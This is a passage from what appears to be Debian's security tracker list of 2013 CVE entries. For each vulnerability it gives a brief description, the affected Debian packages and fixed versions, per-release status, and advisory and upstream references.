	NOT-FOR-US: Drupal addon
CVE-2013-0323 (Cross-site scripting (XSS) vulnerability in the Display Suite module 7 ...)
	NOT-FOR-US: Drupal addon
CVE-2013-0322 (Cross-site scripting (XSS) vulnerability in Views in the Ubercart modu ...)
	NOT-FOR-US: Drupal addon
CVE-2013-0321 (Cross-site scripting (XSS) vulnerability in Views in the Ubercart View ...)
	NOT-FOR-US: Drupal addon
CVE-2013-0320 (Cross-site request forgery (CSRF) vulnerability in the Taxonomy Manage ...)
	NOT-FOR-US: Drupal addon
CVE-2013-0319 (Cross-site scripting (XSS) vulnerability in the Yandex.Metrics module ...)
	NOT-FOR-US: Drupal addon
CVE-2013-0318 (The admin page in the Banckle Chat module for Drupal does not properly ...)
	NOT-FOR-US: Drupal addon
CVE-2013-0317 (Cross-site scripting (XSS) vulnerability in the Manager Change for Org ...)
	NOT-FOR-US: Drupal addon
CVE-2013-0316 (The Image module in Drupal 7.x before 7.20 allows remote attackers to ...)
	- drupal7 7.14-2 (bug #701165)
	- drupal6 (Only affects Drupal 7)
CVE-2013-0315 (The GateIn Portal export/import gadget in JBoss Enterprise Portal Plat ...)
	NOT-FOR-US: GateIn Portal
CVE-2013-0314 (The GateIn Portal export/import gadget in JBoss Enterprise Portal Plat ...)
	NOT-FOR-US: GateIn Portal
CVE-2013-0313 (The evm_update_evmxattr function in security/integrity/evm/evm_crypto. ...)
	- linux 3.2.39-1
	- linux-2.6 (Vulnerable code not present)
CVE-2013-0312 (389 Directory Server before 1.3.0.4 allows remote attackers to cause a ...)
	- 389-ds-base 1.3.0.3-1
CVE-2013-0311 (The translate_desc function in drivers/vhost/vhost.c in the Linux kern ...)
	- linux 3.2.41-1
	- linux-2.6 (Vulnerable code not present)
CVE-2013-0310 (The cipso_v4_validate function in net/ipv4/cipso_ipv4.c in the Linux k ...)
	- linux 3.2.29-1
	- linux-2.6 (Vulnerable code not present)
CVE-2013-0309 (arch/x86/include/asm/pgtable.h in the Linux kernel before 3.6.2, when ...)
	- linux 3.2.32-1
	- linux-2.6 (THP not in Squeeze)
	NOTE: Probably gone since 3.2.32, but I checked 3.2.41-2
CVE-2013-0308 (The imap-send command in GIT before 1.8.1.4 does not verify that the s ...)
	- git (OpenSSL support is not enabled in Debian, see bug #701586)
	NOTE: http://marc.info/?l=git&m=136134619013145&w=2
	NOTE: Further reference: SSL support in imap-send (#434599) needs to be addressed first
CVE-2013-0307 (Cross-site scripting (XSS) vulnerability in settings.php in ownCloud b ...)
	- owncloud 4.0.8debian-1.5 (bug #701115)
	NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-003/
CVE-2013-0306 (The form library in Django 1.3.x before 1.3.6, 1.4.x before 1.4.4, and ...)
	{DSA-2634-1}
	- python-django 1.4.4-1 (bug #701186)
CVE-2013-0305 (The administrative interface for Django 1.3.x before 1.3.6, 1.4.x befo ...)
	{DSA-2634-1}
	- python-django 1.4.4-1 (bug #701186)
	NOTE: https://www.djangoproject.com/weblog/2013/feb/19/security/
CVE-2013-0304 (ownCloud Server before 4.5.7 does not properly check ownership of cale ...)
	- owncloud 5.0.3+dfsg-1
CVE-2013-0303 (Unspecified vulnerability in core/ajax/translations.php in ownCloud be ...)
	- owncloud 4.0.8debian-1.5 (bug #701115)
	NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-006/
CVE-2013-0302 (Unspecified vulnerability in ownCloud Server before 4.0.12 allows remo ...)
	- owncloud 5.0.3+dfsg-1
CVE-2013-0301 (Cross-site request forgery (CSRF) vulnerability in apps/calendar/ajax/ ...)
	- owncloud 4.0.8debian-1.5 (bug #701115)
	NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-004/
CVE-2013-0300 (Multiple cross-site request forgery (CSRF) vulnerabilities in ownCloud ...)
	- owncloud (Vulnerable code not present, only affects 4.5 branch)
	NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-004/
CVE-2013-0299 (Multiple cross-site request forgery (CSRF) vulnerabilities in ownCloud ...)
	- owncloud 4.0.8debian-1.5 (bug #701115)
	NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-004/
CVE-2013-0298 (Multiple cross-site scripting (XSS) vulnerabilities in ownCloud 4.5.x ...)
	- owncloud (Vulnerable code not present, only affects 4.5 branch)
	NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-003/
CVE-2013-0297 (Multiple cross-site scripting (XSS) vulnerabilities in ownCloud before ...)
	- owncloud 4.0.8debian-1.5 (bug #701115)
	NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-003/
CVE-2013-0296 (Race condition in pigz before 2.2.5 uses permissions derived from the ...)
	- pigz 2.2.4-2 (low; bug #700608)
	[squeeze] - pigz 2.1.6-1+squeeze1
CVE-2013-0295
	REJECTED
CVE-2013-0294 (packet.py in pyrad before 2.1 uses weak random numbers to generate RAD ...)
	- pyrad 2.0-2 (low; bug #700669)
	[wheezy] - pyrad 1.2-1+deb7u2
	[squeeze] - pyrad 1.2-1+deb6u1
CVE-2013-0293 (oVirt Node: Lock screen accepts F2 to drop to shell causing privilege ...)
	- ovirt-node (bug #502024)
CVE-2013-0292 (The dbus_g_proxy_manager_filter function in dbus-gproxy in Dbus-glib b ...)
	- dbus-glib 0.100.1-1 (bug #700638; high)
	[squeeze] - dbus-glib 0.88-2.1+squeeze1
CVE-2013-0291 (NextGEN Gallery Plugin for WordPress 1.9.10 and 1.9.11 has a Path Disc ...)
	NOT-FOR-US: NextGEN Gallery Plugin for WordPress
CVE-2013-0290 (The __skb_recv_datagram function in net/core/datagram.c in the Linux k ...)
	- linux (Introduced in 3.4, fixed in 3.8)
	- linux-2.6 (Introduced in 3.4)
CVE-2013-0289 (Isync 0.4 before 1.0.6, does not verify that the server hostname match ...)
	- isync 1.0.4-2.2 (low; bug #701052)
	[squeeze] - isync (Minor issue)
	NOTE: http://isync.git.sourceforge.net/git/gitweb.cgi?p=isync/isync;a=patch;h=914ede18664980925628a9ed2a73ad05f85aeedb
CVE-2013-0288 (nss-pam-ldapd before 0.7.18 and 0.8.x before 0.8.11 allows context-dep ...)
	{DSA-2628-1}
	- nss-pam-ldapd 0.8.10-3 (bug #690319)
CVE-2013-0287 (The Simple Access Provider in System Security Services Daemon (SSSD) 1 ...)
	- sssd (Introduced in 1.9.0)
	NOTE: https://www.openwall.com/lists/oss-security/2013/03/20/12
CVE-2013-0286 (Pinboard 1.0.6 theme for Wordpress has XSS. ...)
	NOT-FOR-US: WordPress theme
CVE-2013-0285 (The nori gem 2.0.x before 2.0.2, 1.1.x before 1.1.4, and 1.0.x before ...)
	NOT-FOR-US: nori Ruby gem
CVE-2013-0284 (Ruby agent 3.2.0 through 3.5.2 serializes sensitive data when communic ...)
	NOT-FOR-US: newrelic_rpm Ruby gem
CVE-2013-0283 (Katello: Username in Notification page has cross site scripting ...)
	NOT-FOR-US: Red Hat CloudForms
CVE-2013-0282 (OpenStack Keystone Grizzly before 2013.1, Folsom 2012.1.3 and earlier, ...)
	- keystone 2012.1.1-13 (bug #700947)
CVE-2013-0281 (Pacemaker 1.1.10, when remote Cluster Information Base (CIB) configura ...)
	- pacemaker 1.1.10-1 (low; bug #700923)
	[squeeze] - pacemaker (Minor issue)
	[wheezy] - pacemaker (Minor issue)
	NOTE: https://github.com/ClusterLabs/pacemaker/commit/564f7cc2a51dcd2f28ab12a13394f31be5aa3c93
CVE-2013-0280
	REJECTED
CVE-2013-0279
	REJECTED
CVE-2013-0278
	REJECTED
CVE-2013-0277 (ActiveRecord in Ruby on Rails before 2.3.17 and 3.x before 3.1.0 allow ...)
	{DSA-2620-1}
	- ruby-activerecord-2.3 2.3.14-5
	- rails 2.3.14.1
	NOTE: Starting with 2.3.14.1 rails is a transitional package
CVE-2013-0276 (ActiveRecord in Ruby on Rails before 2.3.17, 3.1.x before 3.1.11, and ...)
	{DSA-2620-1}
	- ruby-activemodel-3.2 3.2.6-3
	- ruby-activerecord-2.3 2.3.14-5
	- rails 2.3.14.1
	NOTE: Starting with 2.3.14.1 rails is a transitional package
	NOTE: The fix for 3.2 is present in ruby-activemodel-3.2, not ruby-activerecord-3.2
CVE-2013-0275 (Multiple cross-site scripting (XSS) vulnerabilities in Ganglia Web bef ...)
	- ganglia 3.6.0-1 (low; bug #700158)
	[squeeze] - ganglia (Minor issue)
	[wheezy] - ganglia (Minor issue)
	- ganglia-web 3.5.8-3 (bug #700159)
	NOTE: Starting with 3.6.0-1 the web frontend is no longer built from src:ganglia, so that version is marked as fixed
	NOTE: https://github.com/ganglia/ganglia-web/commit/31d348947419058c43b8dfcd062e2988abd5058e
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=892823
CVE-2013-0274 (upnp.c in libpurple in Pidgin before 2.10.7 does not properly terminat ...)
	- pidgin 2.10.6-3
	NOTE: http://www.pidgin.im/news/security/?id=68
	[squeeze] - pidgin (Support in oldstable is limited to IRC, Jabber/XMPP, Sametime and SIMPLE)
CVE-2013-0273 (sametime.c in the Sametime protocol plugin in libpurple in Pidgin befo ...)
	- pidgin 2.10.6-3
	[squeeze] - pidgin (Not suitable for code injection)
	NOTE: http://pidgin.im/news/security/?id=67
CVE-2013-0272 (Buffer overflow in http.c in the MXit protocol plugin in libpurple in ...)
	- pidgin 2.10.6-3
	NOTE: http://pidgin.im/news/security/?id=66
	[squeeze] - pidgin (Support in oldstable is limited to IRC, Jabber/XMPP, Sametime and SIMPLE)
CVE-2013-0271 (The MXit protocol plugin in libpurple in Pidgin before 2.10.7 might al ...)
	- pidgin 2.10.6-3
	[squeeze] - pidgin (Support in oldstable is limited to IRC, Jabber/XMPP, Sametime and SIMPLE)
	NOTE: http://pidgin.im/news/security/?id=65
CVE-2013-0270 (OpenStack Keystone Grizzly before 2013.1, Folsom, and possibly earlier ...)
	- keystone 2013.1.1-2
	[wheezy] - keystone (Too intrusive to backport)
	NOTE: https://bugs.launchpad.net/keystone/+bug/1099025
	NOTE: See the notes in the Ubuntu security tracker; the change is too intrusive to be backported
CVE-2013-0269 (The JSON gem before 1.5.5, 1.6.x before 1.6.8, and 1.7.x before 1.7.7 ...)
	{DLA-263-1 DLA-215-1}
	- ruby-json 1.7.3-3 (bug #700436)
	- libjson-ruby
	- ruby1.9.1 1.9.3.194-7 (bug #700471)
	- ruby1.8 (json ext not present in 1.8)
CVE-2013-0268 (The msr_open function in arch/x86/kernel/msr.c in the Linux kernel bef ...)
	- linux 3.2.39-1
	- linux-2.6 2.6.32-48squeeze1
CVE-2013-0267 (The Privileges portion of the web GUI and the XMLRPC API in Apache VCL ...)
	NOT-FOR-US: Apache VCL
CVE-2013-0266 (manifests/base.pp in the puppetlabs-cinder module, as used in PackStac ...)
	NOT-FOR-US: OpenStack Packstack
CVE-2013-0265 (The redirect_stderr function in xnbd_common.c in xnbd-server and xndb- ...)
	- xnbd 0.1.0-pre-hg20-e75b93a47722-3 (low)
	NOTE: http://seclists.org/oss-sec/2013/q1/248
CVE-2013-0264 (An import error was introduced in Cumin in the code refactoring in r53 ...)
	NOT-FOR-US: Cumin
CVE-2013-0263 (Rack::Session::Cookie in Rack 1.5.x before 1.5.2, 1.4.x before 1.4.5, ...)
	{DSA-2783-1}
	- ruby-rack 1.4.1-2.1 (bug #700226)
	- librack-ruby (bug #700226)
	NOTE: https://bugzilla.suse.com/show_bug.cgi?id=802794
	NOTE: Patches in git, commits 0cd7e9aa397f8ebb3b8481d67dbac8b4863a7f07 and 9a81b961457805f6d1a5c275d053068440421e11
CVE-2013-0262 (rack/file.rb (Rack::File) in Rack 1.5.x before 1.5.2 and 1.4.x before ...)
	- ruby-rack 1.4.1-2.1 (bug #700173)
	- librack-ruby (Introduced in 1.4.0, see #700226)
	NOTE: Patches in git, commit 6f237e4c9fab649d3750482514f0fde76c56ab30
CVE-2013-0261 ((1) installer/basedefs.py and (2) modules/ospluginutils.py in PackStac ...)
	NOT-FOR-US: OpenStack Packstack
CVE-2013-0260 (Unspecified vulnerability in the Drush Debian Packaging module for Dru ...)
	NOT-FOR-US: Drupal module debuild
	NOTE: This is distinct from the drush package.
CVE-2013-0259 (Cross-site scripting (XSS) vulnerability in the Boxes module 7.x-1.x b ...)
	NOT-FOR-US: Drupal module Boxes
CVE-2013-0258 (The Google Authenticator login (ga_login) module 7.x before 7.x-1.3 fo ...)
	NOT-FOR-US: Drupal module ga_login
CVE-2013-0257 (The email2image module 6.x-1.x and 6.x-2.x for Drupal does not properl ...)
	NOT-FOR-US: Drupal module email2image
CVE-2013-0256 (darkfish.js in RDoc 2.3.0 through 3.12 and 4.x before 4.0.0.preview2.1 ...)
	{DLA-235-1}
	- ruby1.9.1 1.9.3.194-6 (low; bug #699929)
	- ruby1.8 (Only affects 1.9 and 2.0)
	NOTE: http://marc.info/?l=oss-security&m=136021623726440&w=2
	NOTE: https://github.com/rdoc/rdoc/commit/ffa87887ee0517793df7541629a470e331f9fe60
CVE-2013-0255 (PostgreSQL 9.2.x before 9.2.3, 9.1.x before 9.1.8, 9.0.x before 9.0.12 ...)
	{DSA-2630-1}
	- postgresql-9.1 9.1.8-1
	- postgresql-8.4 8.4.16-1
CVE-2013-0254 (The QSharedMemory class in Qt 5.0.0, 4.8.x before 4.8.5, 4.7.x before ...)
	{DLA-210-1}
	- qt4-x11 4:4.8.2+dfsg-11 (bug #699870)
	NOTE: Possible follow-up problem if the patch is applied: http://bugs.debian.org/700530
	NOTE: That may however be a bug in the X.Org server; needs checking
CVE-2013-0253 (The default configuration of Apache Maven 3.0.4, when using Maven Wago ...)
	- wagon2 2.2-3+nmu1 (bug #701991)
CVE-2013-0252 (boost::locale::utf::utf_traits in the Boost.Locale library in Boost 1. ...)
	- boost1.50 (bug #699650)
	- boost1.49 1.49.0-3.2 (bug #699649)
	- boost1.42 (Boost.Locale was not part of boost until 1.48.0, bug #699719)
CVE-2013-0251 (Stack-based buffer overflow in llogincircuit.cc in latd 1.25 through 1 ...)
	- latd 1.31 (low; bug #699625)
	[squeeze] - latd (Minor issue)
CVE-2013-0250 (The init_nss_hash function in exec/totemcrypto.c in Corosync 2.0 befor ...)
	- corosync (Introduced in v1.99.8-2-ge925f42; bug #699615)
	NOTE: https://github.com/corosync/corosync/commit/4378915a33ab7fbbb5874f79dd7cd71b014ef44e#L0R407
	NOTE: https://www.openwall.com/lists/oss-security/2013/02/01/1
CVE-2013-0249 (Stack-based buffer overflow in the Curl_sasl_create_digest_md5_message ...)
	- curl 7.29.0-1 (bug #700002)
	[squeeze] - curl (Only affects 7.26.0 to 7.28.1)
	[wheezy] - curl 7.26.0-1+wheezy1
CVE-2013-0248 (The default configuration of javax.servlet.context.tempdir in Apache C ...)
	- libcommons-fileupload-java 1.3-1 (unimportant)
	NOTE: Only affects example code
CVE-2013-0247 (OpenStack Keystone Essex 2012.1.3 and earlier, Folsom 2012.2.3 and ear ...)
	- keystone 2012.1.1-12 (bug #699835)
	NOTE: https://bugs.launchpad.net/keystone/+bug/1098307
CVE-2013-0246 (The Image module in Drupal 7.x before 7.19, when a private file system ...)
	- drupal7 7.14-1.3 (bug #698334)
	NOTE: https://drupal.org/SA-CORE-2013-001
CVE-2013-0245 (The printer friendly version functionality in the Book module in Drupa ...)
	{DSA-2776-1}
	- drupal6 (bug #698333)
	- drupal7 7.14-1.3 (bug #698334)
	NOTE: https://drupal.org/SA-CORE-2013-001
CVE-2013-0244 (Cross-site scripting (XSS) vulnerability in Drupal 6.x before 6.28 and ...)
	{DSA-2776-1}
	- drupal6 (bug #698333)
	- drupal7 7.14-1.3 (bug #698334)
	NOTE: https://drupal.org/SA-CORE-2013-001
CVE-2013-0242 (Buffer overflow in the extend_buffers function in the regular expressi ...)
	{DLA-165-1}
	- eglibc
	- glibc 2.17-2 (low; bug #699399)
	[wheezy] - eglibc 2.13-38+deb7u1
	NOTE: http://seclists.org/oss-sec/2013/q1/202
CVE-2013-0241 (The QXL display driver in QXL Virtual GPU 0.1.0 allows local users to ...)
	- xserver-xorg-video-qxl 0.0.17-1 (bug #699396)
	[squeeze] - xserver-xorg-video-qxl (minor denial of service issue)
	NOTE: squeeze is affected since it could be a guest of an affected qemu-kvm version
CVE-2013-0240 (Gnome Online Accounts (GOA) 3.4.x, 3.6.x before 3.6.3, and 3.7.x befor ...)
	- gnome-online-accounts 3.4.2-2 (bug #699825)
CVE-2013-0239 (Apache CXF before 2.5.9, 2.6.x before 2.6.6, and 2.7.x before 2.7.3, w ...)
	- jbossas4 (Only builds a few libraries, not the full application server, #581226)
CVE-2013-0238 (The try_parse_v4_netmask function in hostmask.c in IRCD-Hybrid before ...)
	{DSA-2618-1}
	- ircd-hybrid 1:7.2.2.dfsg.2-10 (bug #699267; high)
	[squeeze] - ircd-hybrid 7.2.2.dfsg.2-6.2+squeeze1
	- oftc-hybrid
CVE-2013-0237 (Cross-site scripting (XSS) vulnerability in Plupload.as in Moxiecode p ...)
	- wordpress 3.5.1+dfsg-1 (bug #698929)
	NOTE: http://wordpress.org/news/2013/01/wordpress-3-5-1/
	NOTE: https://www.openwall.com/lists/oss-security/2013/01/25/7
CVE-2013-0236 (Multiple cross-site scripting (XSS) vulnerabilities in WordPress befor ...)
	- wordpress 3.5.1+dfsg-1 (bug #698927)
	NOTE: http://wordpress.org/news/2013/01/wordpress-3-5-1/
	NOTE: https://www.openwall.com/lists/oss-security/2013/01/25/7
CVE-2013-0235 (The XMLRPC API in WordPress before 3.5.1 allows remote attackers to se ...)
	- wordpress 3.5.1+dfsg-1 (bug #698916)
	NOTE: http://wordpress.org/news/2013/01/wordpress-3-5-1/
	NOTE: https://www.openwall.com/lists/oss-security/2013/01/25/7
CVE-2013-0234 (Cross-site scripting (XSS) vulnerability in the Twitter widget in Elgg ...)
	- elgg (bug #526197)
CVE-2013-0233 (Devise gem 2.2.x before 2.2.3, 2.1.x before 2.1.3, 2.0.x before 2.0.5, ...)
	- ruby-devise 3.4.1-1
CVE-2013-0232 (includes/functions.php in ZoneMinder Video Server 1.24.0, 1.25.0, and ...)
	{DSA-2640-1}
	- zoneminder 1.25.0-4 (bug #698910)
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=904103
	NOTE: Upstream forum post: http://www.zoneminder.com/forums/viewtopic.php?f=29&t=20771
CVE-2013-0231 (The pciback_enable_msi function in the PCI backend driver (drivers/xen ...)
	{DSA-2632-1}
	- linux 3.2.41-1
	- linux-2.6
CVE-2013-0230 (Stack-based buffer overflow in the ExecuteSoapAction function in the S ...)
	- miniupnpd (Fixed before initial upload to archive)
CVE-2013-0229 (The ProcessSSDPRequest function in minissdp.c in the SSDP handler in M ...)
	- miniupnpd (Fixed before initial upload to archive)
CVE-2013-0228 (The xen_iret function in arch/x86/xen/xen-asm_32.S in the Linux kernel ...)
	{DLA-103-1}
	- linux 3.2.39-1
	- linux-2.6
	[squeeze] - linux-2.6 2.6.32-48
	NOTE: Actually fixed in 2.6.32-46squeeze1, but that upload was made without a DSA being released for it.
CVE-2013-0227 (Cross-site scripting (XSS) vulnerability in the Search API Sorts modul ...)
	NOT-FOR-US: Drupal addon
CVE-2013-0226 (The Keyboard Shortcut Utility module 7.x-1.x before 7.x-1.1 for Drupal ...)
	NOT-FOR-US: Drupal addon
CVE-2013-0225 (Cross-site scripting (XSS) vulnerability in the User Relationships mod ...)
	NOT-FOR-US: Drupal addon
CVE-2013-0224 (The Video module 7.x-2.x before 7.x-2.9 for Drupal, when using the FFm ...)
	NOT-FOR-US: Drupal addon
CVE-2013-0223 (The SUSE coreutils-i18n.patch for GNU coreutils allows context-depende ...)
	- coreutils (Affected patch not added to Debian package)
	NOTE: https://www.openwall.com/lists/oss-security/2013/01/21/14
CVE-2013-0222 (The SUSE coreutils-i18n.patch for GNU coreutils allows context-depende ...)
	- coreutils (Affected patch not added to Debian package)
	NOTE: https://www.openwall.com/lists/oss-security/2013/01/21/14
CVE-2013-0221 (The SUSE coreutils-i18n.patch for GNU coreutils allows context-depende ...)
	- coreutils (Affected patch not added to Debian package)
	NOTE: https://www.openwall.com/lists/oss-security/2013/01/21/14
CVE-2013-0220 (The (1) sss_autofs_cmd_getautomntent and (2) sss_autofs_cmd_getautomnt ...)
	- sssd 1.8.4-2 (low; bug #698871)
	[squeeze] - sssd (autofs and ssh responders not yet present)
CVE-2013-0219 (System Security Services Daemon (SSSD) before 1.9.4, when (1) creating ...)
	- sssd 1.8.4-2 (low; bug #698871)
	[squeeze] - sssd (Minor issue)
CVE-2013-0218 (The GUI installer in JBoss Enterprise Application Platform (EAP) and E ...)
	- jbossas4 (Only builds a few libraries, not the full application server, #581226)
CVE-2013-0217 (Memory leak in drivers/net/xen-netback/netback.c in the Xen netback fu ...)
	- linux 3.2.39-1
	- linux-2.6
	[squeeze] - linux-2.6 2.6.32-48
CVE-2013-0216 (The Xen netback functionality in the Linux kernel before 3.7.8 allows ...)
	- linux 3.2.39-1
	- linux-2.6
	[squeeze] - linux-2.6 2.6.32-48
CVE-2013-0215 (oxenstored in Xen 4.1.x, Xen 4.2.x, and xen-unstable does not properly ...)
	- xen (ocaml version of the xenstore daemon not used in Debian)
CVE-2013-0214 (Cross-site request forgery (CSRF) vulnerability in the Samba Web Admin ...)
	{DSA-2617-1}
	- samba 2:3.6.6-5
CVE-2013-0213 (The Samba Web Administration Tool (SWAT) in Samba 3.x before 3.5.21, 3 ...)
	{DSA-2617-1}
	- samba 2:3.6.6-5
CVE-2013-0212 (store/swift.py in OpenStack Glance Essex (2012.1), Folsom (2012.2) bef ...)
	- glance 2012.1.1-4
CVE-2013-0211 (Integer signedness error in the archive_write_zip_data function in arc ...)
	- libarchive 3.0.4-3 (bug #703957)
	[squeeze] - libarchive (Vulnerable code not present)
CVE-2013-0210 (The smart proxy Puppet run API in Foreman before 1.2.0 allows remote a ...)
	- foreman (bug #663101)
CVE-2013-0209 (lib/MT/Upgrade.pm in mt-upgrade.cgi in Movable Type 4.2x and 4.3x thro ...)
	{DSA-2611-1}
	- movabletype-opensource 5.1.2+dfsg-1 (bug #697666)
	NOTE: Versions 5.0 or higher not affected
CVE-2013-0208 (The boot-from-volume feature in OpenStack Compute (Nova) Folsom and Es ...)
	- nova 2012.1.1-12
CVE-2013-0207 (Cross-site request forgery (CSRF) vulnerability in the Mark Complete m ...)
	NOT-FOR-US: module for Drupal
CVE-2013-0206 (Unrestricted file upload vulnerability in the Live CSS module 6.x-2.x ...)
	NOT-FOR-US: module for Drupal
CVE-2013-0205 (Cross-site request forgery (CSRF) vulnerability in the RESTful Web Ser ...)
	NOT-FOR-US: module for Drupal
CVE-2013-0204 (settings/personal.php in ownCloud 4.5.x before 4.5.6 allows remote aut ...)
	- owncloud (Vulnerable code not present, only affects 4.5 branch)
	NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-002/
CVE-2013-0203 (Multiple cross-site scripting (XSS) vulnerabilities in ownCloud 4.5.5, ...)
	- owncloud 4.0.8debian-1.4 (bug #698737)
	[wheezy] - owncloud 4.0.4debian2-3.3
	NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-001/
CVE-2013-0202 (Cross-site scripting (XSS) vulnerability in ownCloud 4.5.5, 4.0.10, an ...)
	- owncloud 4.0.8debian-1.4 (bug #698737)
	[wheezy] - owncloud 4.0.4debian2-3.3
	NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-001/
CVE-2013-0201 (Multiple cross-site scripting (XSS) vulnerabilities in ownCloud 4.5.5, ...)
	- owncloud 4.0.8debian-1.4 (bug #698737)
	[wheezy] - owncloud 4.0.4debian2-3.3
	NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-001/
CVE-2013-0200 (HP Linux Imaging and Printing (HPLIP) through 3.12.4 allows local user ...)
{DSA-2829-1} - hplip 3.12.6-3.1 (low; bug #701185) [squeeze] - hplip (Minor issue) CVE-2013-0199 (The default LDAP ACIs in FreeIPA 3.0 before 3.1.2 do not restrict acce ...) NOT-FOR-US: FreeIPA CVE-2013-0198 (Dnsmasq before 2.66test2, when used with certain libvirt configuration ...) - dnsmasq 2.66-1 (low) [wheezy] - dnsmasq (Minor issue) [squeeze] - dnsmasq (Minor issue) NOTE: https://www.openwall.com/lists/oss-security/2013/01/18/2 CVE-2013-0197 (Cross-site scripting (XSS) vulnerability in the filter_draw_selection_ ...) - mantis (This only affects the 1.2.12 version, which isn't present in Debian, bug #698481) NOTE: http://www.mantisbt.org/bugs/view.php?id=15373 CVE-2013-0196 (A CSRF issue was found in OpenShift Enterprise 1.2. The web console is ...) NOT-FOR-US: OpenShift CVE-2013-0195 (Cross-site Scripting (XSS) in Piwik before 1.10.1 allows remote attack ...) - piwik (bug #506933) NOTE: http://piwik.org/blog/2013/01/piwik-1-10/ CVE-2013-0194 (Cross-site Scripting (XSS) in Piwik before 1.10.1 allows remote attack ...) - piwik (bug #506933) NOTE: http://piwik.org/blog/2013/01/piwik-1-10/ CVE-2013-0193 (Cross-site Scripting (XSS) in Piwik before 1.10.1 allows remote attack ...) - piwik (bug #506933) NOTE: http://piwik.org/blog/2013/01/piwik-1-10/ CVE-2013-0192 (File Disclosure in SMF (SimpleMachines Forum) <= 2.0.3: Forum admin ...) NOT-FOR-US: Simple Machines Forum CVE-2013-0188 REJECTED CVE-2013-0190 (The xen_failsafe_callback function in Xen for the Linux kernel 2.6.23 ...) - linux 3.2.39-1 - linux-2.6 [squeeze] - linux-2.6 2.6.32-47 CVE-2013-0189 (cachemgr.cgi in Squid 3.1.x and 3.2.x, possibly 3.1.22, 3.2.4, and oth ...) {DSA-2631-1} - squid 2.7.STABLE9-2 NOTE: squid-cgi was removed in 2.7.STABLE9-2 - squid3 3.1.20-2.1 (bug #696187) NOTE: possible regression, see #701123 CVE-2013-0191 (libpam-pgsql (aka pam_pgsql) 0.7 does not properly handle a NULL value ...) 
- pam-pgsql 0.7.3.1-4 (bug #698241) [squeeze] - pam-pgsql 0.7.1-4+squeeze2 NOTE: patch: https://sourceforge.net/u/lvella/pam-pgsql/ci/9361f5970e5dd90a747319995b67c2f73b91448c/ NOTE: bugreport: https://sourceforge.net/p/pam-pgsql/bugs/13/ CVE-2013-0187 (Foreman before 1.1 allows remote authenticated users to gain privilege ...) - foreman (bug #663101) CVE-2013-0186 (Multiple cross-site scripting (XSS) vulnerabilities in ManageIQ EVM al ...) NOT-FOR-US: ManageIQ EVM (CloudForms) CVE-2013-0185 (Cross-site request forgery (CSRF) vulnerability in ManageIQ Enterprise ...) NOT-FOR-US: ManageIQ EVM (CloudForms) CVE-2013-0184 (Unspecified vulnerability in Rack::Auth::AbstractRequest in Rack 1.1.x ...) {DSA-2783-1} - ruby-rack 1.4.1-2.1 (bug #698440) - librack-ruby CVE-2013-0183 (multipart/parser.rb in Rack 1.3.x before 1.3.8 and 1.4.x before 1.4.3 ...) {DSA-2783-1} - ruby-rack 1.4.1-2.1 (bug #698440) - librack-ruby NOTE: commit 24d512531bd88f2d6ce94b3a3d9798fde8fbb713 refactored the multipart module NOTE: and introduced the fast_forward_to_first_boundry function. NOTE: https://github.com/rack/rack/commit/24d512531bd88f2d6ce94b3a3d9798fde8fbb713 CVE-2013-0182 (The Payment module 7.x-1.x before 7.x-1.3 for Drupal does not properly ...) NOT-FOR-US: Drupal module Payment CVE-2013-0181 (Cross-site scripting (XSS) vulnerability in Views in the Search API (s ...) NOT-FOR-US: Drupal module search_api CVE-2013-0180 (Insecure temporary file vulnerability in Redis 2.6 related to /tmp/red ...) - redis 2:2.6.7-1 NOTE: https://www.openwall.com/lists/oss-security/2013/01/14/3 NOTE: Issue introduced to (incorrect) fix the CVE-2013-0178 temporary file issue, NOTE: where the fix introduced a new issue. CVE-2013-0179 (The process_bin_delete function in memcached.c in memcached 1.4.4 and ...) 
- memcached 1.4.13-0.2 (low; bug #698231) [squeeze] - memcached 1.4.5-1+deb6u1 NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=895054 NOTE: https://code.google.com/p/memcached/issues/detail?id=306 NOTE: https://code.google.com/p/memcached/issues/attachmentText?id=306&aid=3060004000&name=0001-Fix-buffer-overrun-when-logging-key-to-delete-in-bin.patch CVE-2013-0178 (Insecure temporary file vulnerability in Redis before 2.6 related to / ...) - redis 2:2.6.0-1 (low) [squeeze] - redis (Minor issue) [wheezy] - redis (Minor issue) NOTE: RedHat bugreport mentions 2.4 is affected, but not 2.6 CVE-2013-0177 (Multiple cross-site scripting (XSS) vulnerabilities in widget/screen/M ...) NOT-FOR-US: OFBiz CVE-2013-0176 (The publickey_from_privatekey function in libssh before 0.5.4, when no ...) - libssh 0.5.4-1 (low; bug #698963) [squeeze] - libssh (Minor issue) NOTE: http://www.libssh.org/2013/01/22/libssh-0-5-4-security-release/ NOTE: http://git.libssh.org/projects/libssh.git/commit/?h=v0-5&id=55b09f426417406bb25c0b9c474fbab1398b0dc8 CVE-2013-0175 (multi_xml gem 0.5.2 for Ruby, as used in Grape before 0.2.6 and possib ...) - ruby-multi-xml (Vulnerable version never in the archive) NOTE: fixed in https://rubygems.org/gems/multi_xml/versions/0.5.2 CVE-2013-0174 (The external node classifier (ENC) API in Foreman before 1.1 allows re ...) - foreman (bug #663101) CVE-2013-0173 (Foreman before 1.1 uses a salt of "foreman" to hash root passwords, wh ...) - foreman (bug #663101) CVE-2013-0172 (Samba 4.0.x before 4.0.1, in certain Active Directory domain-controlle ...) - samba4 4.0.0~beta2+dfsg1-3.1 (high; bug #699188) - samba (Only affects Active Directory functionality) NOTE: https://lists.samba.org/archive/samba-technical/2013-January/089911.html CVE-2013-0171 (Foreman before 1.1 allows remote attackers to execute arbitrary code v ...) - foreman (bug #663101) CVE-2013-0170 (Use-after-free vulnerability in the virNetMessageFree function in rpc/ ...) 
